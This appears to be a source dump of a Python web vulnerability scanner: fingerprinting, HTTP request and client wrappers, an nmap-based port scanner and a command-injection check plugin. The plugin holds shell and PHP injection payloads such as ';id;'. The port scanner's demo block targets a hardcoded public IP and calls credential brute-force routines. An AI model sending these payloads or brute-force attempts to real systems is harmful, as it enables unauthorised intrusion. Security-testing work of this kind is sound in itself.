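    #{"wordpress":{"url":"/wp-admin.php","header":("server":"WAF/2.0"),"md5":"aaaaaaaaaaa"}}
    def scan_finger(self,site):
        '''
        Request every fingerprint URL and collect the applications that match.

        As a side effect the status code and the ``server`` header of the
        last response are kept for ``get_code()`` and ``get_server()``.

        :param site: URL of the site to examine.
        :return: list of ``(target_url, app_name)`` tuples.
        '''
        app_name_list = []
        # The URL object does not depend on the entry being tested.
        urlobj = URL(site)

        for item in self._app_db:
            line = item.strip()
            # Blank lines used to reach json.loads() and abort the scan.
            if not line or line.startswith("#"):
                continue

            try:
                dict_item = json.loads(line)
            except ValueError:
                log.error("FingerScan: skipping malformed fingerprint entry")
                continue

            app_name = "".join(dict_item.keys()).strip()
            app_info = dict_item.get(app_name)
            url = app_info.get("url")

            if self._scan_mode==1:
                test_url = urlobj.get_uri_string()
                if test_url.endswith("/"):
                    target_url = test_url[0:-1] + url
                else:
                    target_url = test_url + url
            else:
                test_url = urlobj.get_netloc()
                target_url = urlobj.get_scheme()+"://"+test_url+ url

            log.info(target_url)
            try:
                res = wcurl.get(target_url)
            except Exception:
                continue

            # Other callers of wcurl.get() treat None as a failed request.
            if res is None:
                continue

            dst_headers = res.headers
            dst_body = res.body

            self._http_code = res.get_code()

            try:
                self._server_finger = dst_headers["server"]
            except Exception:
                pass

            if dst_body is None:
                continue

            md5_body = self.md5(dst_body)

            key_list = app_info.keys()

            # Precedence: a "headers" rule (optionally narrowed by "body"),
            # else a "body" rule, else an exact "md5" of the body.
            if "headers" in key_list:
                app_headers = app_info.get("headers")
                app_key = app_headers[0].lower()
                app_value = app_headers[1]

                if app_key in dst_headers.keys():
                    dst_info = dst_headers.get(app_key)
                    result = re.search(app_value,dst_info,re.I)
                    if result:
                        if "body" in key_list:
                            app_body = app_info.get("body")
                            result = re.search(app_body,dst_body,re.I)
                            if result:
                                app_name_list.append((target_url,app_name))
                        else:
                            app_name_list.append((target_url,app_name))

            elif "body" in key_list:
                app_body = app_info.get("body")
                result = re.search(app_body,dst_body,re.I)
                if result:
                    app_name_list.append((target_url,app_name))

            elif "md5" in key_list:
                app_md5 = app_info.get("md5")
                if app_md5 == md5_body:
                    app_name_list.append((target_url,app_name))

        return app_name_list

    def get_server(self):
        '''
        Return the ``server`` header of the last response, if there was one.
        '''
        return self._server_finger

    def get_code(self):
        '''
        Return the status code of the last response.
        '''
        return self._http_code

if __name__=="__main__":
    if len(sys.argv)<2:
        print("Plz Input Site")
        sys.exit()

    fs = FingerScan()
    print(sys.argv[1])
    test=fs.scan_finger(sys.argv[1])
    print(test)
    for item in test:
        print(item)
    print(fs.get_server())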
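#coding=utf-8
# /teye_web/http/Request.py
'''
Request.py
'''
import os
import sys

import uuid
import copy
from URL import URL

from teye_data.config import cfg

class Request(object):
    '''
    An HTTP request as the scanner handles it: URL, method, headers and data.

    Two requests compare equal when URL and method are equal; headers and
    data are not part of the comparison.
    '''
    #Default user agent string
    DEFAULT_USER_AGENT = cfg["scan_signature"] if cfg.has_key("scan_signature") else "TScanner/1.0"

    def __init__(self,url,method='GET',headers=None,cookies=None,referer=None,data=None,user_agent=DEFAULT_USER_AGENT,**kwargs):
        '''
        :param url: URL object or URL string.
        :param method: HTTP method; stored in upper case, as set_method() does.
        :param headers: extra headers (copied into the request).
        :param cookies: value for the Cookie header.
        :param referer: value for the Referer header.
        :param data: POST data.
        :param user_agent: value for the User-Agent header.
        '''
        if isinstance(url,URL):
            self._url = url
        else:
            self._url = URL(url)

        # __str__ compares with "POST", so 'post' used to lose its body.
        self._method = method.upper() if method else method

        self.id = uuid.uuid1()

        self._headers = {}
        if headers:
            self._headers.update(headers)

        self._cookies = cookies

        self._referer = referer

        self._user_agent = user_agent

        if self._cookies:
            self._headers.update({"Cookie": self._cookies})

        if self._referer:
            self._headers.update({"Referer": self._referer})

        if self._user_agent:
            self._headers.update({"User-Agent": self._user_agent})

        self._get_data = self._url.get_querystring()

        self._post_data = data if data else ""

    def _sync_header(self,name,value):
        '''
        Keep one header in step with its attribute: set it when the value is
        non-empty, drop it otherwise.
        '''
        if value:
            self._headers[name] = value
        else:
            self._headers.pop(name,None)

    def get_get_param(self):
        '''
        Return the query-string data.
        '''
        return self._get_data

    def get_post_param(self):
        '''
        Return the POST data.
        '''
        return self._post_data

    def get_url(self):
        '''
        Return the URL object.
        '''
        return self._url

    def get_method(self):
        '''
        Return the HTTP method.
        '''
        return self._method

    def get_id(self):
        '''
        Return the UUID given to this request at creation.
        '''
        return self.id

    def get_headers(self):
        '''
        Return the header dict.
        '''
        return self._headers

    def get_cookies(self):
        '''
        Return the cookie value.
        '''
        return self._cookies

    def set_method(self,method):
        '''
        Set the HTTP method (stored in upper case).
        '''
        self._method = method.upper()

    def set_post_data(self,postdata):
        '''
        Replace the POST data.
        '''
        self._post_data = postdata

    def set_get_data(self,getdata):
        '''
        Replace the query-string data.
        '''
        self._get_data = getdata

    def set_referer(self,referer):
        '''
        Set the referer and the Referer header.
        '''
        self._referer = referer
        # The header was only written in __init__, so a later change never
        # reached get_headers() or the serialised request.
        self._sync_header("Referer",referer)

    def set_cookies(self,cookies):
        '''
        Set the cookies and the Cookie header.
        '''
        self._cookies = cookies
        # Same reason as in set_referer(): without this the request kept
        # sending the cookie it was created with.
        self._sync_header("Cookie",cookies)

    def __eq__(self, other):
        '''
        Equal when both are requests with the same URL and method.
        '''
        if not isinstance(other,Request):
            return NotImplemented
        return self._url == other._url and self._method == other._method

    def __ne__(self, other):
        '''
        Python 2 does not derive ``!=`` from ``__eq__``.
        '''
        result = self.__eq__(other)
        if result is NotImplemented:
            return result
        return not result

    def __str__(self):
        '''
        Serialise the request as HTTP/1.1 text, encoded as UTF-8.
        '''
        result_string = self._method

        result_string +=" "+self._url.url_string + " HTTP/1.1\r\n"

        headers = copy.deepcopy(self._headers)
        headers.update({"Host":self._url.get_host()})

        for key,value in headers.iteritems():
            # Formatting instead of "+" so that a header value that is not a
            # plain string (a cookie object, for instance) does not raise.
            result_string +="%s: %s" % (key,value)
            result_string +="\r\n"

        result_string +="\r\n"

        if self._method=="POST":
            result_string +=str(self._post_data)

        result_string = result_string.encode("utf-8")

        return result_string

    def __repr__(self):
        '''
        Short form with method, URL and id.
        '''
        vals = {'method':self.get_method(),'url':self.get_url().url_string,'id':self.get_id()}

        return '<Request | %(method)s | %(url)s | %(id)s>' % vals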
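{'method':self.get_method(),'url':self.get_url().url_string,'id':self.get_id()} 151 | 152 | return '<Request | %(method)s | %(url)s | %(id)s>' % vals 153 | 154 | if __name__=="__main__": 155 | ''' 156 | ''' 157 | req = Request("http://www.baidu.com/index.php?id=1") 158 | print req.get_get_param() 159 | print req.get_url() 160 | print req 161 | 162 | a = [] 163 | a.append(req) 164 | print a 165 |
--------------------------------------------------------------------------------
/wCurl.py:
--------------------------------------------------------------------------------
#coding=utf-8
'''
wCurl.py

Thin wrapper around ``requests`` used by the scanner plugins.  Importing this
module has process-wide side effects: urllib3 warnings are silenced, a default
socket timeout is set, and ``socket.socket.connect`` is replaced by a pacing
hook when the module-level ``wcurl`` instance is created.
'''
import time
import socket
import httplib
import requests
# NOTE(review): this silences every urllib3 warning for the whole process,
# including the one raised when a TLS certificate is not verified.  Keep it
# only where unverified HTTPS is an accepted, documented choice.
requests.packages.urllib3.disable_warnings()

from teye_data.config import cfg
from teye_web.http.URL import URL
from teye_web.http.Request import Request
from teye_web.http.Response import Response,from_requests_response

timeout = 60
socket.setdefaulttimeout(timeout)

DEBUGSWITCH = 0 #0 disables debugging, 1 enables it

class wCurl:
    '''
    HTTP client facade: adds the scanner's User-Agent, paces new socket
    connections and converts ``requests`` results into ``Response`` objects.
    Transport failures are reported as an empty ``Response`` rather than as
    exceptions.
    '''
    # Module-level functions of ``requests`` that _send_req may dispatch to.
    _HTTP_VERBS = ("get","options","head","post","put","patch","delete")

    def __init__(self):
        '''
        Install the connect hook and read the scan settings from ``cfg``.
        '''
        self._time = 0.0    # start of the current pacing window (epoch seconds)
        self._speed = 20    # connections per second allowed inside a window
        self._conn = 0      # connections counted in the current window
        self._hook_manager()

        self._scan_signature = cfg["scan_signature"] if cfg.has_key("scan_signature") else "TScanner/1.0"
        self._scan_cookies = cfg["scan_cookies"] if cfg.has_key("scan_cookies") else {}
        self._scan_proxies = cfg["scan_proxies"] if cfg.has_key("scan_proxies") else {}

        httplib.HTTPConnection.debuglevel = DEBUGSWITCH

    def _hook_manager(self):
        '''
        Replace ``socket.socket.connect`` with a wrapper that runs
        _hook_connect first.

        The patch is applied to the class, so every socket in the process is
        paced, not only those opened through this object, and each new wCurl
        instance wraps whatever ``connect`` is installed at that moment.
        '''
        _connect = socket.socket.connect

        socket.socket.connect = lambda *args,**kwargs: self._hook_connect(_connect,self,args,kwargs)

    def _hook_connect(self,*args,**kwargs):
        '''
        Pace outgoing connections, then call the original ``connect``.

        ``args`` is ``(real_connect, wcurl_instance, connect_args,
        connect_kwargs)`` as packed by _hook_manager.  The counter is reset
        once the current window is older than 5 seconds; otherwise the call
        sleeps in 10 ms steps until connections/elapsed is at most
        ``self._speed``.
        '''
        realfun,selfobj,realargs,realkwargs = args
        while True:
            begin = time.time()
            now_time = max(0.01,begin-self._time)

            if now_time > 5:
                self._conn = 0
                # Restart the window at the current time.  Storing the
                # elapsed interval here instead made every later call look
                # like an expired window, so the limit stopped applying
                # after the first reset.
                self._time = begin
                break
            if self._conn/now_time<=self._speed:
                break
            time.sleep(0.01)

        self._conn +=1

        return realfun(*realargs,**realkwargs)

    def get_default_headers(self,headers):
        '''
        Return a new dict holding the scanner User-Agent, overridden by the
        entries of *headers* (which may be None or empty).
        '''
        default_headers = {"User-Agent":self._scan_signature}

        if headers:
            default_headers.update(headers)

        return default_headers

    def get(self,url, headers=None, **kwargs):
        '''
        Send a GET request and return a Response.

        url     -- URL instance or a value accepted by URL()
        headers -- optional extra headers
        kwargs  -- passed through to requests.get

        The cookies and proxies read from ``cfg`` are not applied here; only
        _send_req uses them.
        '''
        default_headers = self.get_default_headers(headers)

        if not isinstance(url,URL):
            url = URL(url)

        # requests applies no timeout unless one is passed explicitly.
        kwargs.setdefault("timeout",timeout)

        requests_response = None
        try:
            requests_response = requests.get(url.url_string,headers=default_headers,**kwargs)
        except Exception:
            # best effort: a failed request becomes an empty Response
            pass

        return self._make_response(requests_response,url)

    def post(self,url, headers=None, data=None, **kwargs):
        '''
        Send a POST request with body *data* and return a Response.

        Same conventions as get().
        '''
        default_headers = self.get_default_headers(headers)

        if not isinstance(url,URL):
            url = URL(url)

        # requests applies no timeout unless one is passed explicitly.
        kwargs.setdefault("timeout",timeout)

        requests_response = None
        try:
            requests_response = requests.post(url.url_string,headers=default_headers,data=data,**kwargs)
        except Exception:
            # best effort: a failed request becomes an empty Response
            pass

        return self._make_response(requests_response,url)


    def __getattr__(self,name):
        '''
        Fallback for attributes that do not exist: prints the name and
        implicitly returns None.

        NOTE(review): because nothing is raised, a mistyped attribute or
        method name yields None instead of AttributeError.
        '''
        print(name)


    def _send_req(self,req):
        '''
        Send a Request object with the configured cookies and proxies and
        return a Response.

        The method name is only resolved against the HTTP helper functions
        of ``requests``; any other value gives an empty Response instead of
        looking up an arbitrary attribute of the module.
        '''
        method = req.get_method()
        uri = req.get_url().get_uri_string()
        querystring = req.get_get_param()
        postdata = req.get_post_param()
        headers = req.get_headers()
        cookies = self._scan_cookies
        proxies = self._scan_proxies

        verb = method.lower()
        if verb not in self._HTTP_VERBS:
            return self._make_response(None,req.get_url())
        send = getattr(requests,verb)

        requests_response = None
        try:
            requests_response = send(uri,params=querystring,data=postdata,headers=headers,cookies=cookies,proxies=proxies,timeout=timeout)
        except Exception:
            # best effort: a failed request becomes an empty Response
            pass

        return self._make_response(requests_response,req.get_url())

    def _make_response(self,resp_from_requests,req_url):
        '''
        Wrap a ``requests`` response, or build an empty Response for
        *req_url* when there is none.
        '''
        if resp_from_requests is None:
            return Response(req_url=req_url)

        return from_requests_response(resp_from_requests,req_url)

wcurl = wCurl()
--------------------------------------------------------------------------------
/teye_web/http/encode_decode.py:
--------------------------------------------------------------------------------
1 | # coding=utf-8 2 | ''' 3 | encode_decode.py 4 | ''' 5 | import re 6 | from htmlentitydefs import name2codepoint 7 | import urllib 8 | import sys 9 | 10 | # This pattern matches a character entity reference (a decimal numeric 11 | # references, a hexadecimal numeric reference, or a named reference). 12 | CHAR_REF_PATT = re.compile(r'&(#(\d+|x[\da-fA-F]+)|[\w.:-]+);?', re.U) 13 | 14 | def htmldecode(text, use_repr=False): 15 | """ 16 | Decode HTML entities in the given text. 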
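
    >>> htmldecode('hola mundo') == 'hola mundo'
    True
    >>> htmldecode(u'hólá múndó') == u'hólá múndó'
    True
    >>> htmldecode(u'hola &#443;') == u'hola \u01bb' ## u'hola ƻ'
    True
    >>> htmldecode(u'hola mundo &#x41;') == u'hola mundo A'
    True
    >>> htmldecode(u'&aacute;') == u'\xe1' ## u'á'
    True

    The text usually comes from a remote server, so a numeric reference
    whose value unichr() rejects is left as written instead of raising.
    The use_repr argument is not read by the body.
    """

    # Internal function to do the work
    def entitydecode(match):
        entity = match.group(1)

        try:
            if entity.startswith('#x'):
                return unichr(int(entity[2:], 16))

            if entity.startswith('#'):
                return unichr(int(entity[1:]))
        except (ValueError, OverflowError):
            # code point outside the range unichr() accepts
            return match.group(0)

        if entity in name2codepoint:
            return unichr(name2codepoint[entity])

        # unknown named reference: keep the original text
        return match.group(0)

    # "main"
    return CHAR_REF_PATT.sub(entitydecode, text)


50 | def urlencode(query, encoding, safe='%/\<>"\'=:()'): 51 | ''' 52 | This is my version of urllib.urlencode. It adds "/" as a safe character 53 | and also adds support for "repeated parameter names". 54 | 55 | Note: 56 | This function is EXPERIMENTAL and should be used with care ;) 57 | 58 | Original documentation: 59 | Encode a sequence of two-element tuples or dictionary into a URL query 60 | string. 61 | 62 | If any values in the query arg are sequences and doseq is true, each 63 | sequence element is converted to a separate parameter. 64 | 65 | If the query arg is a sequence of two-element tuples, the order of the 66 | parameters in the output will match the order of parameters in the 67 | input. 68 | 69 | 70 | >>> import cgi 71 | >>> urlencode(cgi.parse_qs(u'a=1&a=c'), 'latin1') 72 | 'a=1&a=c' 73 | >>> urlencode(cgi.parse_qs(u'a=1&b=c'), 'latin1') 74 | 'a=1&b=c' 75 | >>> urlencode(cgi.parse_qs(u'a=á&a=2'), 'latin1') 76 | 'a=%C3%A1&a=2' 77 | >>> urlencode(u'a=b&c=d', 'utf-8') 78 | Traceback (most recent call last): 79 | ... 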
80 | TypeError: not a valid non-string sequence or mapping object 81 | ''' 82 | 83 | if hasattr(query, "items"): 84 | # mapping objects 85 | query = query.items() 86 | else: 87 | # it's a bother at times that strings and string-like objects are 88 | # sequences... 89 | try: 90 | # non-sequence items should not work with len() 91 | # non-empty strings will fail this 92 | if len(query) and not isinstance(query[0], tuple): 93 | raise TypeError 94 | # zero-length sequences of all types will get here and succeed, 95 | # but that's a minor nit - since the original implementation 96 | # allowed empty dicts that type of behavior probably should be 97 | # preserved for consistency 98 | except TypeError: 99 | try: 100 | tb = sys.exc_info()[2] 101 | raise TypeError, "not a valid non-string sequence or mapping "\ 102 | "object", tb 103 | finally: 104 | del tb 105 | 106 | l = [] 107 | is_unicode = lambda x: isinstance(x, unicode) 108 | 109 | if encoding=="gbk": 110 | encoding = "utf-8" 111 | 112 | for k, v in query: 113 | # first work with keys 114 | k = k.encode(encoding) if is_unicode(k) else str(k) 115 | k = urllib.quote(k, safe) 116 | 117 | if isinstance(v, basestring): 118 | v = [v] 119 | else: 120 | try: 121 | # is this a sufficient test for sequence-ness? 
122 | len(v) 123 | except TypeError: 124 | v = [str(v)] 125 | for ele in v: 126 | ele = ele.encode(encoding) if is_unicode(ele) else str(ele) 127 | l.append(k + '=' + urllib.quote(ele, safe)) 128 | 129 | return '&'.join(l) 130 | -------------------------------------------------------------------------------- /thirdparty/libnmap/test/files/1_hosts_down.xml: -------------------------------------------------------------------------------- 1 | <?xml version="1.0"?> 2 | <?xml-stylesheet href="file:///usr/share/nmap/nmap.xsl" type="text/xsl"?> 3 | <!-- Nmap 5.51 scan initiated Thu Apr 4 20:55:51 2013 as: nmap -oX test/1_hosts_down.xml 10.1.1.1 --> 4 | <nmaprun scanner="nmap" args="nmap -oX test/1_hosts_down.xml 10.1.1.1" start="1365101751" startstr="Thu Apr 4 20:55:51 2013" version="5.51" xmloutputversion="1.03"> 5 | <scaninfo type="syn" protocol="tcp" numservices="1000" services="1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,
2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,
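14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/> 6 | <verbose level="0"/> 7 | <debugging level="0"/> 8 | <host starttime="1365101751" endtime="1365101755"><status state="up" reason="reset"/> 9 | <address addr="10.1.1.1" addrtype="ipv4"/> 10 | <hostnames> 11 | </hostnames> 12 | <ports><extraports state="filtered" count="1000"> 13 | <extrareasons reason="no-responses" count="1000"/> 14 | </extraports> 15 | </ports> 16 | <times srtt="826" rttvar="2554" to="100000"/> 17 | </host> 18 | <runstats><finished time="1365101755" timestr="Thu Apr 4 20:55:55 2013" elapsed="4.55" summary="Nmap done at Thu Apr 4 20:55:55 2013; 1 IP address (1 host up) scanned in 4.55 seconds" exit="success"/><hosts up="1" down="0" total="1"/> 19 | </runstats> 20 | </nmaprun> 21 |
--------------------------------------------------------------------------------
/teye_port/PortScan.py:
--------------------------------------------------------------------------------
#coding=utf-8

import os
import sys

from thirdparty.libnmap.process import NmapProcess
from thirdparty.libnmap.parser import NmapParser,NmapParserException

import re
import time
import socket

import brute_ftp
#import brute_ssh
#import brute_smtp
#import brute_mysql

class PortScan:
    '''
    Port discovery helper: a quick TCP connect probe of a fixed port list
    (scan_port) and an nmap service scan (nmap_scan).
    '''
    # connect_ex() return value for a successful connection
    NORMAL= 0

    NMAP_STATE=["open"]#open,filtered,closed,unfiltered

    NMAP_OPTIONS = "-sV -p 21-25,80-89,110,111,443,513,873,1080,1433,1521,2375,3306,3389,3690,5900,6379,7001,8000-8090,9000,9418,11211,27017-27019,50060"

    # Three dotted numeric groups ("N.N.N."); used with match(), so it only
    # applies at the start of the string.
    _IP_PREFIX_RE = re.compile(r"\d{1,3}\.\d{1,3}\.\d{1,3}\.")

    def __init__(self):
        '''
        Set the port list probed by scan_port and the per-connection timeout.
        '''
        self._check_port = [21,22,80,110,111,873,1433,3306,3389,6379,27017]

        # seconds allowed for each TCP connect attempt
        self._timeout = 5

        # "host:port" strings of HTTP services found by the last nmap_scan
        self._http_target = []

    def is_ipaddr(self,target):
        '''
        Return True when *target* starts with three dotted numeric groups,
        i.e. looks like an IPv4 address (or an address range or CIDR block).

        The test is anchored at the start of the string so that a host name
        which merely contains such a sequence is not taken for an address.
        Octet values are not range-checked.
        '''
        return self._IP_PREFIX_RE.match(target) is not None

    def get_ipaddr(self,domain):
        '''
        Return *domain* unchanged when is_ipaddr() accepts it, otherwise the
        address from socket.gethostbyname().  Resolution errors propagate.
        '''
        if self.is_ipaddr(domain):
            return domain

        return socket.gethostbyname(domain)

    def is_alive(self,netloc):
        '''
        Return True when a TCP connection to *netloc* succeeds.

        netloc is "host" (port 80 is used) or "host:port".  The attempt is
        bounded by self._timeout, and the socket is always closed.
        '''
        if netloc.find(":")>-1:
            pieces = netloc.split(":")
            ipaddr = self.get_ipaddr(pieces[0])
            port = int(pieces[1])
        else:
            ipaddr = self.get_ipaddr(netloc)
            port = 80

        s = None
        try:
            s = socket.socket()
            s.settimeout(float(self._timeout))
            return s.connect_ex((ipaddr,port)) == PortScan.NORMAL
        except Exception:
            return False
        finally:
            if s is not None:
                s.close()

    def nmap_scan(self,target,option=NMAP_OPTIONS):
        '''
        Run nmap against *target* and return {address: [open ports]}.

        Blocks, polling every 5 seconds, until the nmap process ends.
        Services whose name contains "http" are also recorded as "host:port"
        strings, available from get_http_target().  An empty dict is returned
        when nmap did not finish successfully.
        '''
        #reset self._http_target
        self._http_target = []

        #Nmap param should str or list
        if isinstance(target,unicode):
            str_target = target.encode("utf-8")
        else:
            # byte strings and lists are handed over unchanged
            str_target = target

        nmap_proc = NmapProcess(targets=str_target,options=option)
        nmap_proc.run_background()

        while nmap_proc.is_running():
            time.sleep(5)

        result = dict()
        if not nmap_proc.is_successful():
            return result

        nmap_report = NmapParser.parse(nmap_proc.stdout)

        for host in nmap_report.hosts:

            ipaddr = host.address
            if not ipaddr:
                continue

            port_open = []
            for item in host.services:
                if item.state.lower() not in PortScan.NMAP_STATE:
                    continue

                port = item.port
                # a service record may carry no name at all
                name = item.service_dict.get("name") or ""

                if name.find("http")>-1:
                    if self.is_ipaddr(target):
                        http_item = ipaddr +":"+str(port)
                    else:
                        http_item = target + ":" + str(port)
                    self._http_target.append(http_item)

                port_open.append(port)

            result[ipaddr] = port_open

        return result

    def get_http_target(self):
        '''
        Return the "host:port" list collected by the last nmap_scan().
        '''
        return self._http_target

    def scan_port(self,target):
        '''
        Probe the fixed port list with TCP connects and return
        {address: [open ports]}.

        Port 80 is listed first when is_alive(target) succeeds.
        '''
        port_open = []

        result = dict()

        if self.is_alive(target):
            port_open.append(80)

        ipaddr = self.get_ipaddr(target)

        for port in self._check_port:
            # A socket that has connected once (or was closed) cannot be
            # used for another connect, so every probe gets its own socket.
            s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
            s.settimeout(float(self._timeout))
            try:
                status = s.connect_ex((ipaddr,port))
            except Exception:
                continue
            finally:
                s.close()

            if status == PortScan.NORMAL:
                if port not in port_open:
                    port_open.append(port)
            else:
                print(str(port) + ": no open")

            time.sleep(0.1)

        result[ipaddr]=port_open

        return result

176 | if __name__=="__main__": 177 | ''' 178 | ''' 179 | target = "31.193.196.16" 180 | 181 | ps = PortScan() 182 | 183 | print "Port Scanning Host:" + ps.get_ipaddr(target) 184 | 185 | open_ports = ps.nmap_scan(target) 186 | 187 | print open_ports 188 | 189 | if 21 in open_ports: 190 | brute_ftp.brute(target_ipaddr,"username.lst","password.lst") 191 | 192 | if 22 in open_ports: 193 | brute_ssh.brute(target_ipaddr,"username.lst","password.lst") 194 | 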
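195 | if 25 in open_ports: 196 | brute_smtp.brute(target_ipaddr,"username.lst","password.lst") 197 | 198 | if 3306 in open_ports: 199 | brute_mysql.brute(target_ipaddr,"username.lst","password.lst") 200 |
--------------------------------------------------------------------------------
/teye_web/cmd.py:
--------------------------------------------------------------------------------
# coding=utf-8
'''
cmd.py
'''
import sys

# NOTE(review): a developer-specific absolute path is added to the module
# search path.  Python imports modules from that directory whenever it exists
# on the machine running the scanner, so it must be writable only by the
# scanner's owner, or better be replaced by a package-relative import.
sys.path.append("/Users/imiyoo/workplace/tscanner/")
import teye_data.severity as severity
from teye_data.vuln import vuln
from teye_data.vulnmanager import vm

from LogManager import log

import re
import copy

# wCurl
from wCurl import wcurl
from http.Request import Request

from util.smart_fill import smart_fill


class cmd:
    '''
    Scanner plugin that checks whether a request parameter is evaluated as a
    command by the target, by comparing responses against known output
    patterns.  Running it sends test requests to the target.
    '''

    def __init__(self):
        '''
        Load the test database.
        '''
        # Scan mode: 0 fuzzes parameters, 1 fuzzes paths
        self._fuzz_mode = 0

        self._cmd_db = self._get_cmd_db()

    def check(self, t_request):
        '''
        Test every query parameter of *t_request* and register a finding with
        the vulnerability manager for each response that matches.

        Only GET requests are exercised; for any other method nothing is
        sent and nothing is reported.
        '''
        log.info(u"正在检测目标是否存在命令执行漏洞...")

        http_request = copy.deepcopy(t_request)

        # The loop below only knows how to send GET requests, and body data
        # is not guaranteed to be a parameter dict, so stop here otherwise.
        if http_request.get_method() != "GET":
            return

        param_dict = http_request.get_get_param()
        target_uri = http_request.get_url().get_uri_string()

        for name, poc_info, pattern in self._get_payload_list(param_dict):
            res = wcurl.get(target_uri, params=poc_info)
            if not self._find_vuln(res, pattern):
                continue

            v = vuln()
            url = res.get_url()
            v.set_url(url.get_uri_string() + "?" + str(poc_info))
            v.set_method("GET")
            v.set_param(name)
            v.set_name("CMD Vuln")
            v.set_rank(severity.H)
            vm.append(self, url.get_host(), "cmd", v)
            log.info("CMD Vuln")
            print(u"CMD Vuln 漏洞URL:%s,漏洞参数:%s" % (url, name))

    def _find_vuln(self, res, pattern):
        '''
        Return True when *pattern* (a regular expression, matched
        case-insensitively) occurs in the response body.
        '''
        res_body = res.body

        if res_body is None:
            return False

        return re.search(pattern, res_body, re.I) is not None

    def _get_cmd_db(self):
        '''
        Return the test database: a list of dicts with the keys "type",
        "cmd", "payload" (list of strings appended to a parameter value) and
        "pattern" (regular expression expected in the response).

        #"type":"linux","cmd":"id","payload":";id;","pattern":""
        '''
        cmd_db = []

        cmd_item = {}
        cmd_item["type"] = "linux"
        cmd_item["cmd"] = "id"
        # "||id;",
        cmd_item["payload"] = [";id;", "';id;'"]
        cmd_item["pattern"] = r"uid=\d+\(\w+\)\s*gid=\d+\(\w+\)\s*groups=\d+\(\w+\)"
        cmd_db.append(cmd_item)

        cmd_item = {}
        cmd_item["type"] = "php"
        cmd_item["cmd"] = "print(md5(imiyoo))"
        cmd_item["payload"] = [";${print(md5(imiyoo))}", "';${print(md5(imiyoo))};'", "\"]=1;${print(md5(imiyoo))};//"]
        cmd_item["pattern"] = r"1417a3e718a3d279aefda8711a0f5f65"
        cmd_db.append(cmd_item)

        cmd_item = {}
        cmd_item["type"] = "win"
        cmd_item["cmd"] = "set"
        cmd_item["payload"] = [";set;", "||set;"]
        # NOTE(review): in a regular expression "\W" is the non-word
        # character class, so this pattern does not match the literal text
        # it spells out; a literal backslash has to be written as "\\".
        cmd_item["pattern"] = r"SystemRoot=C:\Windows"
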